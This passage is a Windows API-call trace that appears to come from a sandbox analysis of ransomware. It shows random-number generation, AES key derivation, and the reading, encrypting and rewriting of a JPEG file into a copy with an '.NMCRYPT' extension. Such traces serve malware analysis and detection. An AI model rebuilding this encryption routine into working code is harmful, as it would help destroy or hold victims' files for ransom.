CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.430] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.431] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.432] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.433] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.433] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.433] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0163.433] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.433] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad7f8) returned 1 [0163.433] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.434] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.434] wcslen (_String="\\\\?\\") returned 0x4 [0163.434] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad478) returned 1 [0163.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.440] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=6406) returned 1 [0163.440] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.441] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.442] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.442] GetLastError () returned 0x0 [0163.442] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.443] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.443] GetLastError () returned 0x0 [0163.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.443] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.443] GetLastError () returned 0x0 [0163.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.443] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.443] GetLastError () returned 0x0 [0163.443] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.443] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.444] GetLastError () returned 0x0 [0163.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, 